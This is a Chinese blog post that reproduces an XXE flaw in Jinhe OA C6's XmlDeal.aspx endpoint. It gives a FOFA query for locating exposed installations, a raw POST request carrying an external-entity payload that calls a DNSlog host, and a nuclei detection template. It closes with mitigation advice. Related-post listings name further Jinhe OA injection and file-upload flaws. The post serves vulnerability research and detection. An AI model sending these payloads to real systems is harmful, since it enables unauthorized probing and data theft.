金和OA_XmlDeal接口存在XXE漏洞

已于 2024-05-17 10:44:09 修改
阅读量497 收藏 6
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全 安全 网络安全
于 2024-05-17 10:40:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46604997/article/details/138998093

0x00、声明

        本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。

中华人民共和国网络安全法

第二十七条 规定

        任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。

0x01、概述

一、厂商信息

        金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务.

二、漏洞描述

      金和OA C6系统XmlDeal接口存在XXE漏洞,应用程序在解析XML数据时,没有正确验证或限制实体引用,攻击者就可以通过构造恶意的XML输入,将外部实体引用进来,从而执行恶意操作。

三、指纹

FOFA:

app="金和网络-金和OA"

0x02、漏洞复现

2.1、生成一个DNSlog服务

2.2、发包测试

POST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1
Host: {{hostname}}
Content-Type: application/Xml

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://ouakfkzojb.dgrh3.cn"> %remote;]>'

payload:<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://DNSlog"> %remote;]>'

dnslog成功响应

2.3、dnslog网站平台测试

测试截图

0x03、检测POC

nuclei脚本

id: jinhe_XEE

info:
  name: jinhe_XEE_vuln
  author: qweqzqzq
  severity: high
  description: C6-XmlDeal.aspx接口
  metadata:
    max-request: 1
    fofa-query: app="金和网络-金和OA"

requests:
- raw:
  - |
    POST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/Xml

    <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{{interactsh-url}}"> %remote;]>'

  matchers-condition: and
  matchers:
      - type: word
        part: interactsh_protocol 
        words:
          - "dns"
      - type: status
        status:
          - 200

测试截图:

0x04、防范措施

1、过滤用户提交的XML数据;

2、使用开发语言提供的禁用外部实体的方法;

3、过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC;

4、升级到最新版本。

金和OA GetAttOut接口存在SQL注入漏洞
nnn2188185的博客
01-12 263
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
金和OA GetTreeDate.aspx SQL注入漏洞
xiaokp7的博客
09-22 715
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
漏洞复现】金和OA C6 ApproveRemindSetExec.aspx XXE漏洞(CNVD-2024-40568)
最新发布
m0_71944965的博客
12-05 392
金和 ApproveRemindSetExec.aspx 接口存在XML实体注入漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。
金和OA SAP_B1Config.aspx存在未授权访问漏洞
3tefanie的博客
01-03 771
【有些话可以不说透,自欺欺人,就可以糊涂一世,打打闹闹轻轻松松。】
金和OA C6 gethomeinfo sql注入漏洞
Keepb1ue的博客
12-25 2338
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和 OA C6 gethomeinfo接口存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA C6 XmlDeal.aspx XXE漏洞复现
0xSec
03-31 656
金和OA C6 XmlDeal.aspx 接口存在XML实体注入漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。
漏洞复现】金和OA XmlDeal.aspx XXE漏洞
qq_67810151的博客
04-01 651
金和OA-C6-XmlDeal.aspx接口存在XML实体注入漏洞,未授权的攻击者可通过该漏洞获取服务器敏感数据。
漏洞复现】金和OA-C6-xmldeal-XXE
知黑而守白
01-25 321
金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA协同办公管理系统 XmlDeal 接口存在xxe漏洞存在一处XML外部实体(XXE漏洞。攻击者通过精心构造的XML文件可能导致系统解析敏感信息,从而获取敏感数据或执行潜在的攻击。
漏洞复现】​金和OA存在任意文件读取漏洞
失心少年
11-18 432
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该系统存在任意文件读漏洞。本文所提供的工具仅用于学习,禁止用于其他!
金和OA C6任意文件读取漏洞 复现[附POC]
薛定谔嘚喵博客
10-11 1242
金和OA C6系统的download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
金和OA加密狗破解组件
07-13
通过调整程序类库破解金和OA加密狗通过调整程序类库破解金和OA加密狗
金和OA jc6 clobfield接口存在SQL注入漏洞
3tefanie的博客
12-19 900
【一个人活着时无论怎样苦口婆心劝说都听不进去的话,等到人不在了,那些话却像印上文件的朱记,抹都抹不去。】
金和OA GetSqlData.aspx 远程命令执行漏洞
xiaokp7的博客
09-13 913
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
金和OA jc6 ntko-upload 任意文件上传漏洞
3tefanie的博客
01-03 1123
【是人就有私心,就容易走错路。】
金和OA C6 UploadFileEditorSave.aspx 任意文件上传漏洞
Keepb1ue的博客
01-06 2194
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和 OA C6 uploadfileeditorsave接口存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
漏洞复现-金和OA GetAttOut接口SQL注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-14 1050
漏洞复现-金和OA GetAttOut接口SQL注入漏洞,附带自己写的poc脚本
金和OA saveAsOtherFormatServlet接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-05 310
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该系统存在任意文件读漏洞
金和OA Servlet接口任意文件上传漏洞
故事讲予风听
12-06 923
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
金和OA C6 UploadFileEditor.aspx SQL注入漏洞复现
0xSec
08-16 369
金和OA C6 UploadFileEditor.aspx接口存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
致远oa getajaxdataservlet接口存在xxe漏洞
01-23
致远OA的GetAjaxDataServlet接口存在XXE漏洞,这是一种XML外部实体注入漏洞。攻击者可以利用这个漏洞向服务器发送恶意XML文件,并利用此文件来读取服务器上的敏感文件或执行远程命令。如果这个漏洞被成功利用,攻击者可能会窃取用户数据、破坏系统、或者获取管理员权限。 为了解决这个漏洞,致远OA的开发团队首先需要对GetAjaxDataServlet接口进行深入的安全审计,找出漏洞的具体位置和原因。然后,他们需要及时修复漏洞,更新软件版本并通知用户进行及时更新。另外,他们也需要在软件开发过程中加强安全意识,采用安全编码规范,避免类似的漏洞再次出现。 对于系统管理员和用户来说,需要及时关注致远OA官方的安全公告,了解漏洞的风险和影响范围,及时安装官方发布的补丁或更新版本。另外,管理员还需要加强系统的安全配置,限制网络访问权限,以减少漏洞被利用的机会。 最后,致远OA的用户也需要注意不在未知的或不信任的网络环境下访问OA系统,避免泄露个人信息或者造成系统安全问题。大家都应该共同努力来保障OA系统的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值